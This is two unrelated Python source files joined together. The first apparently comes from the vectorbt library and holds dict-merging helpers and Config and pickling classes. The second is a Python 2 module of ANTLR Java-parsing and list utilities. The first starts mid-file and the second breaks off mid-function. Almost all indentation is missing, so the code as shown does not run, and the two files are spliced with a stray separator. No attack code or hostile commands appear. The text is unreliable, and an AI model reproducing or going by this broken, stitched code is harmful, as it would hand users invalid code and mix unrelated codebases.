"""Dict that behaves like a single value when merging."""
pass
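# Sketch of the intended difference (see merge_dicts below; values illustrative):
# merge_dicts({'a': {'x': 1}}, {'a': {'y': 2}})          -> {'a': {'x': 1, 'y': 2}}
# merge_dicts({'a': {'x': 1}}, {'a': atomic_dict(y=2)})  -> {'a': {'y': 2}}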
InConfigLikeT = tp.Union[None, dict, "ConfigT"]
OutConfigLikeT = tp.Union[dict, "ConfigT"]
def convert_to_dict(dct: InConfigLikeT, nested: bool = True) -> dict:
"""Convert any dict (apart from `atomic_dict`) to `dict`.
    Set `nested` to True to convert all child dicts recursively."""
if dct is None:
dct = {}
if isinstance(dct, atomic_dict):
dct = atomic_dict(dct)
else:
dct = dict(dct)
if not nested:
return dct
for k, v in dct.items():
if isinstance(v, dict):
dct[k] = convert_to_dict(v, nested=nested)
else:
dct[k] = v
return dct
def set_dict_item(dct: dict, k: tp.Any, v: tp.Any, force: bool = False) -> None:
"""Set dict item.
If the dict is of the type `Config`, also passes `force` keyword to override blocking flags."""
if isinstance(dct, Config):
dct.__setitem__(k, v, force=force)
else:
dct[k] = v
def copy_dict(dct: InConfigLikeT, copy_mode: str = 'shallow', nested: bool = True) -> OutConfigLikeT:
"""Copy dict based on a copy mode.
The following modes are supported:
* 'shallow': Copies keys only.
* 'hybrid': Copies keys and values using `copy.copy`.
* 'deep': Copies the whole thing using `copy.deepcopy`.
    Set `nested` to True to copy all child dicts recursively."""
if dct is None:
dct = {}
checks.assert_type(copy_mode, str)
copy_mode = copy_mode.lower()
if copy_mode not in ['shallow', 'hybrid', 'deep']:
raise ValueError(f"Copy mode '{copy_mode}' not supported")
if copy_mode == 'deep':
return deepcopy(dct)
if isinstance(dct, Config):
return dct.copy(
copy_mode=copy_mode,
nested=nested
)
dct_copy = copy(dct) # copy structure using shallow copy
for k, v in dct_copy.items():
if nested and isinstance(v, dict):
_v = copy_dict(v, copy_mode=copy_mode, nested=nested)
else:
if copy_mode == 'hybrid':
_v = copy(v) # copy values using shallow copy
else:
_v = v
set_dict_item(dct_copy, k, _v, force=True)
return dct_copy
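# In short (illustrative): 'shallow' copies only the (nested) dict structure
# and shares the values, 'hybrid' additionally shallow-copies each value, and
# 'deep' behaves like copy.deepcopy on the whole dict.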
def update_dict(x: InConfigLikeT,
y: InConfigLikeT,
nested: bool = True,
force: bool = False,
same_keys: bool = False) -> None:
"""Update dict with keys and values from other dict.
    Set `nested` to True to update all child dicts recursively.
For `force`, see `set_dict_item`.
If you want to treat any dict as a single value, wrap it with `atomic_dict`.
!!! note
If the child dict is not atomic, it will copy only its values, not its meta."""
if x is None:
return
if y is None:
return
checks.assert_type(x, dict)
checks.assert_type(y, dict)
for k, v in y.items():
if nested \
and k in x \
and isinstance(x[k], dict) \
and isinstance(v, dict) \
and not isinstance(v, atomic_dict):
update_dict(x[k], v, force=force)
else:
if same_keys and k not in x:
continue
set_dict_item(x, k, v, force=force)
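# Example (illustrative): nested keys are merged rather than replaced.
# x = {'a': {'b': 1}}
# update_dict(x, {'a': {'c': 2}})  # x == {'a': {'b': 1, 'c': 2}}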
def merge_dicts(*dicts: InConfigLikeT,
to_dict: bool = True,
copy_mode: tp.Optional[str] = 'shallow',
nested: bool = True,
same_keys: bool = False) -> OutConfigLikeT:
"""Merge dicts.
Args:
*dicts (dict): Dicts.
to_dict (bool): Whether to call `convert_to_dict` on each dict prior to copying.
copy_mode (str): Mode for `copy_dict` to copy each dict prior to merging.
Pass None to not copy.
        nested (bool): Whether to merge all child dicts recursively.
same_keys (bool): Whether to merge on the overlapping keys only."""
# copy only once
if to_dict:
dicts = tuple([convert_to_dict(dct, nested=nested) for dct in dicts])
if copy_mode is not None:
dicts = tuple([copy_dict(dct, copy_mode=copy_mode, nested=nested) for dct in dicts])
x, y = dicts[0], dicts[1]
if isinstance(x, atomic_dict) or isinstance(y, atomic_dict):
x = y
else:
update_dict(x, y, nested=nested, force=True, same_keys=same_keys)
if len(dicts) > 2:
return merge_dicts(
x, *dicts[2:],
to_dict=False, # executed only once
copy_mode=None, # executed only once
nested=nested,
same_keys=same_keys
)
return x
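# Example (illustrative): later dicts win on conflicting keys.
# merge_dicts({'a': 1}, {'b': 2}, {'a': 3})  # -> {'a': 3, 'b': 2}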
_RaiseKeyError = object()
DumpTuple = namedtuple('DumpTuple', ('cls', 'dumps'))
PickleableT = tp.TypeVar("PickleableT", bound="Pickleable")
class Pickleable:
"""Superclass that defines abstract properties and methods for pickle-able classes."""
def dumps(self, **kwargs) -> bytes:
"""Pickle to bytes."""
raise NotImplementedError
@classmethod
def loads(cls: tp.Type[PickleableT], dumps: bytes, **kwargs) -> PickleableT:
"""Unpickle from bytes."""
raise NotImplementedError
def save(self, fname: tp.FileName, **kwargs) -> None:
"""Save dumps to a file."""
dumps = self.dumps(**kwargs)
with open(fname, "wb") as f:
f.write(dumps)
@classmethod
def load(cls: tp.Type[PickleableT], fname: tp.FileName, **kwargs) -> PickleableT:
"""Load dumps from a file and create new instance."""
with open(fname, "rb") as f:
dumps = f.read()
return cls.loads(dumps, **kwargs)
PickleableDictT = tp.TypeVar("PickleableDictT", bound="PickleableDict")
class PickleableDict(Pickleable, dict):
"""Dict that may contain values of type `Pickleable`."""
def dumps(self, **kwargs) -> bytes:
"""Pickle to bytes."""
dct = dict()
for k, v in self.items():
if isinstance(v, Pickleable):
dct[k] = DumpTuple(cls=v.__class__, dumps=v.dumps(**kwargs))
else:
dct[k] = v
return dill.dumps(dct, **kwargs)
@classmethod
def loads(cls: tp.Type[PickleableDictT], dumps: bytes, **kwargs) -> PickleableDictT:
"""Unpickle from bytes."""
config = dill.loads(dumps, **kwargs)
for k, v in config.items():
if isinstance(v, DumpTuple):
config[k] = v.cls.loads(v.dumps, **kwargs)
return cls(**config)
def load_update(self, fname: tp.FileName, **kwargs) -> None:
"""Load dumps from a file and update this instance."""
self.clear()
self.update(self.load(fname, **kwargs))
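# Round-trip sketch (file name is illustrative):
# d = PickleableDict(a=1)
# d.save('state.pkl')
# assert dict(PickleableDict.load('state.pkl')) == {'a': 1}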
ConfigT = tp.TypeVar("ConfigT", bound="Config")
class Config(PickleableDict):
"""Extends dict with config features such as nested updates, frozen keys/values, and pickling.
Args:
dct (dict): Dict to construct this config from.
copy_kwargs (dict): Keyword arguments passed to `copy_dict` for copying `dct` and `reset_dct`.
Copy mode defaults to 'shallow' if `readonly`, otherwise to 'hybrid'.
reset_dct (dict): Dict to fall back to in case of resetting.
If None, copies `dct` using `reset_dct_copy_kwargs`.
reset_dct_copy_kwargs (dict): Keyword arguments that override `copy_kwargs` for `reset_dct`.
frozen_keys (bool): Whether to deny updates to the keys of the config.
Defaults to False.
readonly (bool): Whether to deny updates to the keys and values of the config.
Defaults to False.
nested (bool): Whether to do operations recursively on each child dict.
Such operations include copy, update, and merge.
Disable to treat each child dict as a single value. Defaults to True.
convert_dicts (bool or type): Whether to convert child dicts to configs with the same configuration.
This will trigger a waterfall reaction across all child dicts.
Won't convert dicts that are already configs.
Apart from boolean, you can set it to any subclass of `Config` to use it for construction.
Requires `nested` to be True. Defaults to False.
as_attrs (bool): Whether to enable accessing dict keys via the dot notation.
Enables autocompletion (but only during runtime!).
Raises error in case of naming conflicts.
            Defaults to True if `frozen_keys` or `readonly`, otherwise False.
Defaults can be overridden with settings under `config` in `vectorbt._settings.settings`.
If another config is passed, its properties are copied over, but they can still be overridden
with the arguments passed to the initializer.
!!! note
All arguments are applied only once during initialization.
"""
_copy_kwargs_: tp.Kwargs
_reset_dct_: dict
_reset_dct_copy_kwargs_: tp.Kwargs
_frozen_keys_: bool
_readonly_: bool
_nested_: bool
_convert_dicts_: tp.Union[bool, tp.Type["Config"]]
_as_attrs_: bool
def __init__(self,
dct: tp.DictLike = None,
copy_kwargs: tp.KwargsLike = None,
reset_dct: tp.DictLike = None,
reset_dct_copy_kwargs: tp.KwargsLike = None,
frozen_keys: tp.Optional[bool] = None,
readonly: tp.Optional[bool] = None,
nested: tp.Optional[bool] = None,
convert_dicts: tp.Optional[tp.Union[bool, tp.Type["Config"]]] = None,
as_attrs: tp.Optional[bool] = None) -> None:
try:
from vectorbt._settings import settings
configured_cfg = settings['config']
except ImportError:
configured_cfg = {}
if dct is None:
dct = dict()
# Resolve params
def _resolve_param(pname: str, p: tp.Any, default: tp.Any, merge: bool = False) -> tp.Any:
cfg_default = configured_cfg.get(pname, None)
dct_p = getattr(dct, pname + '_') if isinstance(dct, Config) else None
if merge and isinstance(default, dict):
return merge_dicts(default, cfg_default, dct_p, p)
if p is not None:
return p
if dct_p is not None:
return dct_p
if cfg_default is not None:
return cfg_default
return default
reset_dct = _resolve_param('reset_dct', reset_dct, None)
frozen_keys = _resolve_param('frozen_keys', frozen_keys, False)
readonly = _resolve_param('readonly', readonly, False)
        nested = _resolve_param('nested', nested, True)  # per the docstring, defaults to True
convert_dicts = _resolve_param('convert_dicts', convert_dicts, False)
as_attrs = _resolve_param('as_attrs', as_attrs, frozen_keys or readonly)
reset_dct_copy_kwargs = merge_dicts(copy_kwargs, reset_dct_copy_kwargs)
copy_kwargs = _resolve_param(
'copy_kwargs',
copy_kwargs,
dict(
copy_mode='shallow' if readonly else 'hybrid',
nested=nested
),
merge=True
)
reset_dct_copy_kwargs = _resolve_param(
'reset_dct_copy_kwargs',
reset_dct_copy_kwargs,
dict(
copy_mode='shallow' if readonly else 'hybrid',
nested=nested
),
merge=True
)
# Copy dict
dct = copy_dict(dict(dct), **copy_kwargs)
# Convert child dicts
if convert_dicts:
if not nested:
raise ValueError("convert_dicts requires nested to be True")
for k, v in dct.items():
if isinstance(v, dict) and not isinstance(v, Config):
if isinstance(convert_dicts, bool):
config_cls = self.__class__
elif issubclass(convert_dicts, Config):
config_cls = convert_dicts
else:
raise TypeError("convert_dicts must be either boolean or a subclass of Config")
dct[k] = config_cls(
v,
copy_kwargs=copy_kwargs,
reset_dct_copy_kwargs=reset_dct_copy_kwargs,
frozen_keys=frozen_keys,
readonly=readonly,
nested=nested,
convert_dicts=convert_dicts,
as_attrs=as_attrs
)
# Copy initial config
if reset_dct is None:
reset_dct = dct
reset_dct = copy_dict(dict(reset_dct), **reset_dct_copy_kwargs)
dict.__init__(self, dct)
# Store params in an instance variable
checks.assert_type(copy_kwargs, dict)
checks.assert_type(reset_dct, dict)
checks.assert_type(reset_dct_copy_kwargs, dict)
checks.assert_type(frozen_keys, bool)
checks.assert_type(readonly, bool)
checks.assert_type(nested, bool)
checks.assert_type(convert_dicts, (bool, type))
checks.assert_type(as_attrs, bool)
self.__dict__['_copy_kwargs_'] = copy_kwargs
self.__dict__['_reset_dct_'] = reset_dct
self.__dict__['_reset_dct_copy_kwargs_'] = reset_dct_copy_kwargs
self.__dict__['_frozen_keys_'] = frozen_keys
self.__dict__['_readonly_'] = readonly
self.__dict__['_nested_'] = nested
self.__dict__['_convert_dicts_'] = convert_dicts
self.__dict__['_as_attrs_'] = as_attrs
# Set keys as attributes for autocomplete
if as_attrs:
for k, v in self.items():
if k in self.__dir__():
raise ValueError(f"Cannot set key '{k}' as attribute of the config. Disable set_attrs.")
self.__dict__[k] = v
@property
def copy_kwargs_(self) -> tp.Kwargs:
"""Parameters for copying `dct`."""
return self._copy_kwargs_
@property
def reset_dct_(self) -> dict:
"""Dict to fall back to in case of resetting."""
return self._reset_dct_
@property
def reset_dct_copy_kwargs_(self) -> tp.Kwargs:
"""Parameters for copying `reset_dct`."""
return self._reset_dct_copy_kwargs_
@property
def frozen_keys_(self) -> bool:
"""Whether to deny updates to the keys and values of the config."""
return self._frozen_keys_
@property
def readonly_(self) -> bool:
"""Whether to deny any updates to the config."""
return self._readonly_
@property
def nested_(self) -> bool:
"""Whether to do operations recursively on each child dict."""
return self._nested_
@property
def convert_dicts_(self) -> tp.Union[bool, tp.Type["Config"]]:
"""Whether to convert child dicts to configs with the same configuration."""
return self._convert_dicts_
@property
def as_attrs_(self) -> bool:
"""Whether to enable accessing dict keys via dot notation."""
return self._as_attrs_
def __setattr__(self, k: str, v: tp.Any) -> None:
if self.as_attrs_:
self.__setitem__(k, v)
def __setitem__(self, k: str, v: tp.Any, force: bool = False) -> None:
if not force and self.readonly_:
raise TypeError("Config is read-only")
if not force and self.frozen_keys_:
if k not in self:
raise KeyError(f"Config keys are frozen: key '{k}' not found")
dict.__setitem__(self, k, v)
if self.as_attrs_:
self.__dict__[k] = v
def __delattr__(self, k: str) -> None:
if self.as_attrs_:
self.__delitem__(k)
def __delitem__(self, k: str, force: bool = False) -> None:
if not force and self.readonly_:
raise TypeError("Config is read-only")
if not force and self.frozen_keys_:
raise KeyError(f"Config keys are frozen")
dict.__delitem__(self, k)
if self.as_attrs_:
del self.__dict__[k]
def _clear_attrs(self, prior_keys: tp.Iterable[str]) -> None:
"""Remove attributes of the removed keys given keys prior to the removal."""
if self.as_attrs_:
for k in set(prior_keys).difference(self.keys()):
del self.__dict__[k]
def pop(self, k: str, v: tp.Any = _RaiseKeyError, force: bool = False) -> tp.Any:
"""Remove and return the pair by the key."""
if not force and self.readonly_:
raise TypeError("Config is read-only")
if not force and self.frozen_keys_:
raise KeyError(f"Config keys are frozen")
prior_keys = list(self.keys())
if v is _RaiseKeyError:
result = dict.pop(self, k)
else:
result = dict.pop(self, k, v)
self._clear_attrs(prior_keys)
return result
def popitem(self, force: bool = False) -> tp.Tuple[tp.Any, tp.Any]:
"""Remove and return some pair."""
if not force and self.readonly_:
raise TypeError("Config is read-only")
if not force and self.frozen_keys_:
raise KeyError(f"Config keys are frozen")
prior_keys = list(self.keys())
result = dict.popitem(self)
self._clear_attrs(prior_keys)
return result
def clear(self, force: bool = False) -> None:
"""Remove all items."""
if not force and self.readonly_:
raise TypeError("Config is read-only")
if not force and self.frozen_keys_:
raise KeyError(f"Config keys are frozen")
prior_keys = list(self.keys())
dict.clear(self)
self._clear_attrs(prior_keys)
def update(self, *args, nested: tp.Optional[bool] = None, force: bool = False, **kwargs) -> None:
"""Update the config.
See `update_dict`."""
other = dict(*args, **kwargs)
if nested is None:
nested = self.nested_
update_dict(self, other, nested=nested, force=force)
def __copy__(self: ConfigT) -> ConfigT:
"""Shallow operation, primarily used by `copy.copy`.
Does not take into account copy parameters."""
cls = self.__class__
self_copy = cls.__new__(cls)
for k, v in self.__dict__.items():
if k not in self_copy: # otherwise copies dict keys twice
self_copy.__dict__[k] = v
self_copy.clear(force=True)
self_copy.update(copy(dict(self)), nested=False, force=True)
return self_copy
def __deepcopy__(self: ConfigT, memo: tp.DictLike = None) -> ConfigT:
"""Deep operation, primarily used by `copy.deepcopy`.
Does not take into account copy parameters."""
if memo is None:
memo = {}
cls = self.__class__
self_copy = cls.__new__(cls)
memo[id(self)] = self_copy
for k, v in self.__dict__.items():
if k not in self_copy: # otherwise copies dict keys twice
self_copy.__dict__[k] = deepcopy(v, memo)
self_copy.clear(force=True)
self_copy.update(deepcopy(dict(self), memo), nested=False, force=True)
return self_copy
def copy(self: ConfigT, reset_dct_copy_kwargs: tp.KwargsLike = None, **copy_kwargs) -> ConfigT:
"""Copy the instance in the same way it's done during initialization.
`copy_kwargs` override `Config.copy_kwargs_` and `Config.reset_dct_copy_kwargs_` via merging.
`reset_dct_copy_kwargs` override merged `Config.reset_dct_copy_kwargs_`."""
self_copy = self.__copy__()
reset_dct_copy_kwargs = merge_dicts(self.reset_dct_copy_kwargs_, copy_kwargs, reset_dct_copy_kwargs)
reset_dct = copy_dict(dict(self.reset_dct_), **reset_dct_copy_kwargs)
        self_copy.__dict__['_reset_dct_'] = reset_dct
copy_kwargs = merge_dicts(self.copy_kwargs_, copy_kwargs)
dct = copy_dict(dict(self), **copy_kwargs)
self_copy.update(dct, nested=False, force=True)
return self_copy
def merge_with(self: ConfigT, other: InConfigLikeT,
nested: tp.Optional[bool] = None, **kwargs) -> OutConfigLikeT:
"""Merge with another dict into one single dict.
See `merge_dicts`."""
if nested is None:
nested = self.nested_
return merge_dicts(self, other, nested=nested, **kwargs)
def reset(self, force: bool = False, **reset_dct_copy_kwargs) -> None:
"""Clears the config and updates it with the initial config.
`reset_dct_copy_kwargs` override `Config.reset_dct_copy_kwargs_`."""
if not force and self.readonly_:
raise TypeError("Config is read-only")
reset_dct_copy_kwargs = merge_dicts(self.reset_dct_copy_kwargs_, reset_dct_copy_kwargs)
reset_dct = copy_dict(dict(self.reset_dct_), **reset_dct_copy_kwargs)
self.clear(force=True)
self.update(self.reset_dct_, nested=False, force=True)
self.__dict__['_reset_dct_'] = reset_dct
def make_checkpoint(self, force: bool = False, **reset_dct_copy_kwargs) -> None:
"""Replace `reset_dct` by the current state.
`reset_dct_copy_kwargs` override `Config.reset_dct_copy_kwargs_`."""
if not force and self.readonly_:
raise TypeError("Config is read-only")
reset_dct_copy_kwargs = merge_dicts(self.reset_dct_copy_kwargs_, reset_dct_copy_kwargs)
reset_dct = copy_dict(dict(self), **reset_dct_copy_kwargs)
self.__dict__['_reset_dct_'] = reset_dct
def dumps(self, **kwargs) -> bytes:
"""Pickle to bytes."""
return dill.dumps(dict(
dct=PickleableDict(self).dumps(**kwargs),
copy_kwargs=self.copy_kwargs_,
reset_dct=PickleableDict(self.reset_dct_).dumps(**kwargs),
reset_dct_copy_kwargs=self.reset_dct_copy_kwargs_,
frozen_keys=self.frozen_keys_,
readonly=self.readonly_,
nested=self.nested_,
convert_dicts=self.convert_dicts_,
as_attrs=self.as_attrs_
), **kwargs)
@classmethod
def loads(cls: tp.Type[ConfigT], dumps: bytes, **kwargs) -> ConfigT:
"""Unpickle from bytes."""
obj = dill.loads(dumps, **kwargs)
return cls(
dct=PickleableDict.loads(obj['dct'], **kwargs),
copy_kwargs=obj['copy_kwargs'],
reset_dct=PickleableDict.loads(obj['reset_dct'], **kwargs),
reset_dct_copy_kwargs=obj['reset_dct_copy_kwargs'],
frozen_keys=obj['frozen_keys'],
readonly=obj['readonly'],
nested=obj['nested'],
convert_dicts=obj['convert_dicts'],
as_attrs=obj['as_attrs']
)
def load_update(self, fname: tp.FileName, **kwargs) -> None:
"""Load dumps from a file and update this instance.
!!! note
Updates both the config properties and dictionary."""
loaded = self.load(fname, **kwargs)
self.clear(force=True)
self.__dict__.clear()
self.__dict__.update(loaded.__dict__)
self.update(loaded, nested=False, force=True)
def __eq__(self, other: tp.Any) -> bool:
return checks.is_deep_equal(dict(self), dict(other))
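# Usage sketch (a minimal example; constructor kwargs inferred from `Config.loads` above,
# values hypothetical):
#
#   cfg = Config(dct=dict(a=1), frozen_keys=True, readonly=False,
#                nested=True, convert_dicts=False, as_attrs=True)
#   cfg['a'] = 2           # allowed: 'a' already exists
#   cfg.make_checkpoint()  # snapshot the current state into reset_dct_
#   cfg['a'] = 3
#   cfg.reset()            # roll back to the checkpoint: cfg['a'] == 2
#   cfg['b'] = 4           # raises KeyError: keys are frozen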
class AtomicConfig(Config, atomic_dict):
"""Config that behaves like a single value when merging."""
pass
ConfiguredT = tp.TypeVar("ConfiguredT", bound="Configured")
class Configured(Pickleable):
"""Class with an initialization config.
All subclasses of `Configured` are initialized using `Config`, which makes it easier to pickle.
Config settings are defined under `config.configured` in `vectorbt._settings.settings`.
!!! warning
If any attribute has been overwritten that isn't listed in `Configured.writeable_attrs`,
or if any `Configured.__init__` argument depends upon global defaults,
their values won't be copied over. Make sure to pass them explicitly to
make the saved & loaded / copied instance resilient to changes in globals."""
writeable_attrs: tp.ClassVar[tp.List[str]] = []
"""List of writeable attributes that will be saved/copied along with the config."""
def __init__(self, **config) -> None:
from vectorbt._settings import settings
configured_cfg = settings['config']['configured']
self._config = Config(config, **configured_cfg)
self.writeable_attrs = copy(self.writeable_attrs)
@property
def config(self) -> Config:
"""Initialization config."""
return self._config
def copy(self: ConfiguredT, nested: tp.Optional[bool] = None, **new_config) -> ConfiguredT:
"""Copy config and writeable attributes to initialize a new instance.
!!! warning
This "copy" operation won't return a copy of the instance but a new instance
initialized with the same config and writeable attributes."""
new_instance = self.__class__(**self.config.merge_with(new_config, nested=nested))
for attr in self.writeable_attrs:
setattr(new_instance, attr, getattr(self, attr))
return new_instance
def dumps(self, **kwargs) -> bytes:
"""Pickle to bytes."""
config_dumps = self.config.dumps(**kwargs)
attr_dct = PickleableDict({attr: getattr(self, attr) for attr in self.writeable_attrs})
attr_dct_dumps = attr_dct.dumps(**kwargs)
return dill.dumps((config_dumps, attr_dct_dumps), **kwargs)
@classmethod
def loads(cls: tp.Type[ConfiguredT], dumps: bytes, **kwargs) -> ConfiguredT:
"""Unpickle from bytes."""
config_dumps, attr_dct_dumps = dill.loads(dumps, **kwargs)
config = Config.loads(config_dumps, **kwargs)
attr_dct = PickleableDict.loads(attr_dct_dumps, **kwargs)
new_instance = cls(**config)
for attr, obj in attr_dct.items():
setattr(new_instance, attr, obj)
return new_instance
def __eq__(self, other: tp.Any) -> bool:
"""Objects are equal if their configs and writeable attributes are equal."""
if type(self) != type(other):
return False
if self.writeable_attrs != other.writeable_attrs:
return False
for attr in self.writeable_attrs:
if not checks.is_deep_equal(getattr(self, attr), getattr(other, attr)):
return False
return self.config == other.config
def getattr(self, *args, **kwargs) -> tp.Any:
"""See `vectorbt.utils.attr.deep_getattr`."""
return deep_getattr(self, *args, **kwargs)
def update_config(self, *args, **kwargs) -> None:
"""Force-update the config."""
self.config.update(*args, **kwargs, force=True)
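# Usage sketch (hypothetical subclass; `Configured` captures the __init__ kwargs in `self.config`):
#
#   class MyObj(Configured):
#       def __init__(self, a=1, b=2):
#           Configured.__init__(self, a=a, b=b)
#
#   obj = MyObj(a=10)
#   obj2 = obj.copy(b=20)   # new instance initialized with the merged config
#   assert obj2.config['a'] == 10 and obj2.config['b'] == 20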
|
import datetime
import logging
import operator as op
import os
import re
import shutil
import sys
import traceback
from functools import partial
from itertools import chain, islice, ifilter, ifilterfalse
import antlr3
from antlr3.tree import CommonTree as AST
from grammar.JavaLexer import JavaLexer as Lexer
from grammar.JavaParser import JavaParser as Parser
import lib.glob2 as glob2
from lib.typecheck import *
import lib.const as C
"""
regarding paths and files
"""
# clean all the contents in the designated path, excluding that path
@takes(str)
@returns(nothing)
def clean_dir(path):
for root, dirs, files in os.walk(path):
for f in files:
try: os.unlink(os.path.join(root, f))
except OSError: pass # maybe .swp file
for d in dirs:
shutil.rmtree(os.path.join(root, d))
# get the *sorted* list of file names in the designated path
# template/gui/awt -> [.../AWTEvent.java, .../BorderLayout.java, ...]
@takes(str, str)
@returns(list_of(str))
def get_files_from_path(path, ext):
if os.path.isfile(path): return [path]
else: # i.e., folder
files = glob2.glob(os.path.join(path, "**/*.{}".format(ext)))
return sorted(files) # to guarantee the order of files read
# base name without extension
# result/button_demo.txt -> button_demo
@takes(str)
@returns(str)
def pure_base(path):
base = os.path.basename(path)
return os.path.splitext(base)[0]
# build folders for the given package name
# e.g., for x.y, generate x and then y under x if not exist
@takes(str, unicode)
@returns(nothing)
def build_pkg_folders(java_dir, pkg):
p = java_dir
for elt in pkg.split('.'):
p = os.path.join(p, elt)
if not os.path.exists(p):
os.makedirs(p)
"""
regarding Java features
"""
# extract parameterized types
# Map<K, V> -> [K, V]
# List<T> -> [T]
# Map<K, List<T>> -> [K, List<T>]
@takes(unicode, optional(unicode))
@returns(list_of(unicode))
def extract_generics(tname, base=u"\S+"):
regex = r"^({})<(.+)>$".format(base)
m = re.match(regex, tname.strip())
if m: # m.group(1) = collection name
typs = [m.group(1)] + m.group(2).split(',')
return map(op.methodcaller("strip"), typs)
else: return []
# Map<K,V> / List<T> / ... -> [Map, K, V] / [List, T] / ...
@takes(unicode)
@returns(list_of(unicode))
def of_collection(tname):
for collection in C.collections:
if collection in tname:
typs = extract_generics(tname, u'|'.join(C.collections))
if any(typs): return typs
return []
# check whether the given type name is kind of Java collections
@takes(unicode)
@returns(bool)
def is_collection(tname):
return any(of_collection(tname))
# check whether the given type name has bounded type parameter(s)
@takes(unicode)
@returns(bool)
def is_generic(tname):
return any(extract_generics(tname))
# ArrayAdapter<?> -> [ArrayAdapter, ?]
@takes(unicode)
@returns(list_of(unicode))
def explode_generics(tname):
if is_generic(tname):
return extract_generics(tname)
else: return [tname]
# extract base type out of array
# e.g., X[] -> X
@takes(unicode)
@returns(optional(unicode))
def componentType(tname):
if tname.endswith("[]"): return tname[:-2]
else: return None
# check whether the given type name is kind of array
@takes(unicode)
@returns(bool)
def is_array(tname):
return '[' in tname and ']' in tname
# check whether the given type name is a possible class name or not
@takes(unicode)
@returns(bool)
def is_class_name(tname):
return tname[0].isupper()
# sanitize type name
# e.g., Demo$1 -> Demo_1, Outer.Inner -> Outer_Inner
# ArrayAdapter<?> (-> ArrayAdapter_?) -> ArrayAdapter_Object
@takes(unicode)
@returns(unicode)
def sanitize_ty(tname):
#repl_map = {"$": "_", ".": "_"}
#repl_dic = dict((re.escape(k), v) for k, v in repl_map.iteritems())
#pattern = re.compile(" | ".join(repl_dic.keys()))
#return pattern.sub(lambda m: repl_dic[re.escape(m.group(0))], tname)
_tname = tname.replace('$','_').replace('.','_')
if is_generic(_tname):
_tname = u'_'.join(explode_generics(_tname))
return _tname.replace('?', C.J.OBJ)
# convert type name to JVM notation
# e.g., x.y.Z -> Lx/y/Z;
@takes(unicode)
@returns(unicode)
def toJVM(tname):
if is_class_name(tname.split('.')[-1]):
return u'L' + tname.replace('.','/') + u';'
elif is_array(tname):
return u'[' + toJVM(componentType(tname))
else: return tname
# default value of the given type, depending on framework
_default_values = {
C.J.i: u"0",
C.J.z: C.J.FALSE,
u"default": C.J.N
}
@takes(str, unicode, unicode)
@returns(unicode)
def default_value(cmd, ty, vname):
if cmd == "android":
if ty in C.primitives:
if ty == C.J.z:
v = u"SymUtil.new_sym_bit(\"{}\")".format(vname)
else:
v = u"SymUtil.new_sym_int(\"{}\")".format(vname)
else:
v = u"SymUtil.new_sym(\"{}\", \"{}\")".format(vname, ty)
else:
if ty in _default_values:
v = _default_values[ty]
else: v = _default_values[u"default"]
return v
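# e.g., default_value("android", C.J.i, u"cnt") -> u'SymUtil.new_sym_int("cnt")'
# (assuming C.J.i denotes the int primitive); any other cmd falls back to
# _default_values: 0 for int, false for boolean, null for everything else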
# autoboxing, e.g., int -> Integer
@takes(unicode)
@returns(unicode)
def autoboxing(tname):
if tname in C.primitives:
for i, v in enumerate(C.primitives):
if tname == v: return C.autoboxing[i]
return tname
# unboxing, e.g., Character -> char
@takes(unicode)
@returns(unicode)
def unboxing(tname):
if tname in C.autoboxing:
for i, v in enumerate(C.autoboxing):
if tname == v: return C.primitives[i]
return tname
# short form representation of type name
@takes(unicode)
@returns(optional(unicode))
def to_shorty(tname):
# TODO: (multi-dimensional) array
if tname in C.primitives:
for key, value in C.J.__dict__.iteritems():
if tname == value: return unicode(key)
elif is_class_name(tname):
return u'L'
else: # erroneous
return None
# Sketch-ish short form representation of type name
@takes(unicode)
@returns(unicode)
def to_shorty_sk(tname):
shorty = to_shorty(tname)
if shorty in [u'b', u's', u'i', u'j']: return u'i'
elif shorty == u'z': return u'z'
else: return u''
# check if quoted with double quotation marks
@takes(unicode)
@returns(bool)
def is_str(x):
return len(x) >= 2 and (x[0] == '"' and x[-1] == '"')
# check if quoted with single quotation marks
@takes(unicode)
@returns(bool)
def is_char(x):
return len(x) >= 2 and (x[0] == '\'' and x[-1] == '\'')
# capitalize the first character only
# e.g., applicationContext -> ApplicationContext
@takes(unicode)
@returns(unicode)
def cap_1st_only(s):
return s[:1].upper() + s[1:] if s else ''
# explode method name
# android.app.Activity.onCreate -> android.app, Activity, onCreate
@takes(unicode)
@returns(tuple_of(unicode))
def explode_mname(mname):
mid = mname.split('.')
mtd = mid[-1]
if len(mid) > 1:
cls = mid[-2]
pkg = u'.'.join(mid[:-2])
else:
pkg = cls = u''
return (pkg, cls, mtd)
"""
handling ANTLR AST
"""
@takes(list_of(str))
@returns(AST)
def toAST(files):
ast = antlr3.tree.CommonTree(None)
for fname in files:
logging.debug("reading: " + os.path.normpath(fname))
f_stream = antlr3.FileStream(fname)
lexer = Lexer(f_stream)
t_stream = antlr3.CommonTokenStream(lexer)
parser = Parser(t_stream)
try: _ast = parser.compilationUnit()
except antlr3.RecognitionException:
traceback.print_stack()
sys.exit(1)
ast.addChild(_ast.tree)
return ast
# implode Ids
# KeyEvent . Callback -> KeyEvent.Callback
# Map < String, SharedPreferences > -> Map<String,SharedPreferences>
@takes(AST)
@returns(unicode)
def implode_id(node):
def retrieve_info(node):
t = node.getText()
if node.getChildCount() <= 0: below = u''
else: below = u''.join(map(retrieve_info, node.getChildren()))
if not t or t in C.T.__dict__.values(): return below
else: return t + below
ids = map(retrieve_info, node.getChildren())
return u''.join(ids)
# make a virtual node with the given children
# e.g., (uop id . id (ARGUMENT ...)) -> (None id . id (ARGUMENT ...))
@takes(list_of(AST))
@returns(AST)
def mk_v_node_w_children(nodes):
v_node = AST(None)
v_node.addChildren(nodes)
return v_node
# implode and explode comma-separated elements
# [d , l . distance] -> [(None d), (None l . distance)]
@takes(list_of(AST))
@returns(list_of(AST))
def parse_comma_elems(nodes):
def reduce_at_comma((res, acc), node):
if node.getText() == ',':
return res + [mk_v_node_w_children(acc)], []
else:
return res, acc + [node]
res, acc = reduce(reduce_at_comma, nodes, ([], []))
if not acc: return res
else: return res + [mk_v_node_w_children(acc)]
"""
utilities whose names are inspired by OCaml
"""
# base class for exceptions regarding List
class ListError(Exception): pass
# ~ List.tl in OCaml
# remove the head of the list
@takes(list)
@returns(list)
def tl(lst):
if len(lst) < 1: raise ListError("tl")
return list(islice(lst, 1, None))
# ~ List.exists in OCaml
# checks if at least one element of the list satisfies the predicate
@takes(callable, list)
@returns(bool)
def exists(pred, lst):
return any(filter(pred, lst))
# ~ List.find in OCaml
# find the first element of interest
@takes(callable, list)
@returns(anything)
def find(pred, lst):
f_ed = filter(pred, lst)
